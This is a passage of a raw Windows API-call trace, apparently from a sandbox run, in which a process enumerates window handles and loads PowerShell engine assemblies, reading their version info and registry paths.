lpdwProcessId=0x24e410) returned 0x840 [0129.440] GetLastError () returned 0x514 [0129.440] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x830 [0129.440] GetLastError () returned 0x514 [0129.440] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x820 [0129.440] GetLastError () returned 0x514 [0129.441] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x810 [0129.441] GetLastError () returned 0x514 [0129.441] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x768 [0129.441] GetLastError () returned 0x514 [0129.441] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x364 [0129.441] GetLastError () returned 0x514 [0129.441] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x3f0 [0129.441] GetLastError () returned 0x514 [0129.441] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x6bc [0129.441] GetLastError () returned 0x514 [0129.441] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x23c [0129.441] GetLastError () returned 0x514 [0129.441] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x578 [0129.441] GetLastError () returned 0x514 [0129.441] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x57c [0129.441] GetLastError () returned 0x514 [0129.441] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4b4 [0129.442] GetLastError () returned 0x514 [0129.442] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x764 [0129.442] GetLastError () returned 0x514 [0129.442] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x120 [0129.442] GetLastError () returned 0x514 [0129.442] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x64c [0129.442] GetLastError () returned 0x514 [0129.442] GetWindowThreadProcessId (in: hWnd=0x40158, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x1c4 [0129.442] GetLastError () returned 0x514 [0129.442] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x210 [0129.442] GetLastError () returned 0x514 [0129.442] GetWindowThreadProcessId (in: hWnd=0x3010c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x7f8 [0129.442] GetLastError () returned 0x514 [0129.442] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5ec [0129.442] GetLastError () returned 0x514 [0129.442] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5fc [0129.442] GetLastError () returned 0x514 [0129.443] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5c0 [0129.443] GetLastError () returned 0x514 [0129.443] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x594 [0129.443] GetLastError () returned 0x514 [0129.443] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x730 [0129.443] GetLastError () returned 0x514 [0129.443] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x464 [0129.443] GetLastError () returned 0x514 [0129.443] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x528 [0129.443] GetLastError () returned 0x514 [0129.443] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x614 [0129.443] GetLastError () returned 0x514 [0129.443] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4f0 [0129.444] GetLastError () returned 0x514 [0129.444] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x464 [0129.444] GetLastError () returned 0x514 [0129.444] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x7f4 [0129.444] GetLastError () returned 0x514 [0129.444] GetLastError () returned 0x514 [0129.523] WerSetFlags () returned 0x0 [0130.099] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0130.101] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24e7ec, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24e7e8 | out: pulNumLanguages=0x24e7ec, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24e7e8) returned 1 [0130.101] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24e7ec, pwszLanguagesBuffer=0x2b4f93c, pcchLanguagesBuffer=0x24e7e8 | out: pulNumLanguages=0x24e7ec, pwszLanguagesBuffer=0x2b4f93c, pcchLanguagesBuffer=0x24e7e8) returned 1 [0130.139] GetUserDefaultLocaleName (in: lpLocaleName=0x338390, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0130.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.173] GetLastError () returned 0xcb [0130.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.177] GetLastError () returned 0xcb [0130.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.178] GetLastError () returned 0xcb [0130.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e25c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.405] GetLastError () returned 0xcb [0130.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e278, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.405] GetLastError () returned 0xcb [0130.405] SetErrorMode (uMode=0x1) returned 0x1 [0130.405] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24e6f8 | out: lpFileInformation=0x24e6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0130.406] GetLastError () returned 0xcb [0130.406] SetErrorMode (uMode=0x1) returned 0x1 [0130.406] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24e77c | out: lpdwHandle=0x24e77c) returned 0x94c [0130.407] GetLastError () returned 0x0 [0130.407] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b51e6c | out: lpData=0x2b51e6c) returned 1 [0130.408] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24e748, puLen=0x24e744 | out: lplpBuffer=0x24e748*=0x2b51f08, puLen=0x24e744) returned 1 [0130.408] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x2b51fe4, puLen=0x24e6c0) returned 1 [0130.408] lstrlenW (lpString="Microsoft Corporation") returned 21 [0130.408] lstrcpyW (in: lpString1=0x338390, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0130.408] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x2b52038, puLen=0x24e6c0) returned 1 [0130.408] lstrlenW (lpString="System.Management.Automation") returned 28 [0130.408] lstrcpyW (in: lpString1=0x338390, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0130.408] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x2b52094, puLen=0x24e6c0) returned 1 [0130.408] lstrlenW (lpString="6.1.7601.17514") returned 14 [0130.408] lstrcpyW (in: lpString1=0x338390, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0130.409] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x2b520d4, puLen=0x24e6c0) returned 1 [0130.409] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0130.409] lstrcpyW (in: lpString1=0x338390, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0130.409] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x2b5213c, puLen=0x24e6c0) returned 1 [0130.409] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0130.409] lstrcpyW (in: lpString1=0x338390, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0130.409] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x2b521d8, puLen=0x24e6c0) returned 1 [0130.409] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0130.409] lstrcpyW (in: lpString1=0x338390, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0130.409] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x2b5223c, puLen=0x24e6c0) returned 1 [0130.409] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0130.409] lstrcpyW (in: lpString1=0x338390, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0130.409] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x2b522b8, puLen=0x24e6c0) returned 1 [0130.409] lstrlenW (lpString="6.1.7601.17514") returned 14 [0130.409] lstrcpyW (in: lpString1=0x338390, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0130.409] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x2b51f60, puLen=0x24e6c0) returned 1 [0130.409] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0130.409] lstrcpyW (in: lpString1=0x338390, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0130.409] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x0, puLen=0x24e6c0) returned 0 [0130.409] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x0, puLen=0x24e6c0) returned 0 [0130.409] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24e6c4, puLen=0x24e6c0 | out: lplpBuffer=0x24e6c4*=0x0, puLen=0x24e6c0) returned 0 [0130.409] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24e6b8, puLen=0x24e6b4 | out: lplpBuffer=0x24e6b8*=0x2b51f08, puLen=0x24e6b4) returned 1 [0130.409] VerLanguageNameW (in: wLang=0x0, szLang=0x338390, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0130.410] VerQueryValueW (in: pBlock=0x2b51e6c, lpSubBlock="\\", lplpBuffer=0x24e6cc, puLen=0x24e6c8 | out: lplpBuffer=0x24e6cc*=0x2b51e94, puLen=0x24e6c8) returned 1 [0130.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.415] GetLastError () returned 0xcb [0130.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.519] GetLastError () returned 0xcb [0130.522] lstrlenW (lpString="䅁") returned 1 [0130.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e690 | out: phkResult=0x24e690*=0x320) returned 0x0 [0130.525] RegOpenKeyExW (in: hKey=0x320, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e694 | out: phkResult=0x24e694*=0x324) returned 0x0 [0130.525] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e6c8 | out: phkResult=0x24e6c8*=0x328) returned 0x0 [0130.526] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e708, lpData=0x0, lpcbData=0x24e704*=0x0 | out: lpType=0x24e708*=0x1, lpData=0x0, lpcbData=0x24e704*=0x56) returned 0x0 [0130.527] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e708, lpData=0x338390, lpcbData=0x24e704*=0x56 | out: lpType=0x24e708*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e704*=0x56) returned 0x0 [0130.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.530] GetLastError () returned 0x0 [0130.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.531] GetLastError () returned 0x0 [0130.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.558] GetLastError () returned 0x0 [0130.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.619] GetLastError () returned 0xcb [0131.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0131.339] GetLastError () returned 0x2 [0131.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0131.339] GetLastError () returned 0x2 [0131.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.698] GetLastError () returned 0xcb [0131.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.699] GetLastError () returned 0xcb [0131.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.723] GetLastError () returned 0xcb [0131.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.724] GetLastError () returned 0xcb [0131.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.724] GetLastError () returned 0xcb [0132.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0132.116] GetLastError () returned 0x0 [0132.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0132.116] GetLastError () returned 0x0 [0132.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0132.200] GetLastError () returned 0xcb [0132.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0132.204] GetLastError () returned 0xcb [0132.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0132.288] GetLastError () returned 0x7e [0132.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0132.289] GetLastError () returned 0x7e [0133.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0133.612] GetLastError () returned 0x2 [0133.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0133.613] GetLastError () returned 0x2 [0133.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.810] GetLastError () returned 0x57 [0133.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.810] GetLastError () returned 0x57 [0134.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0134.138] GetLastError () returned 0x2 [0134.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0134.138] GetLastError () returned 0x2 [0134.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0134.342] GetLastError () returned 0x2 [0134.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0134.342] GetLastError () returned 0x2 [0134.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.487] GetLastError () returned 0xcb [0134.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e298, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0134.488] GetLastError () returned 0xcb [0134.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0134.488] GetLastError () returned 0xcb [0134.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0134.489] GetLastError () returned 0xcb [0134.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e248, lpFilePart=0x0 | 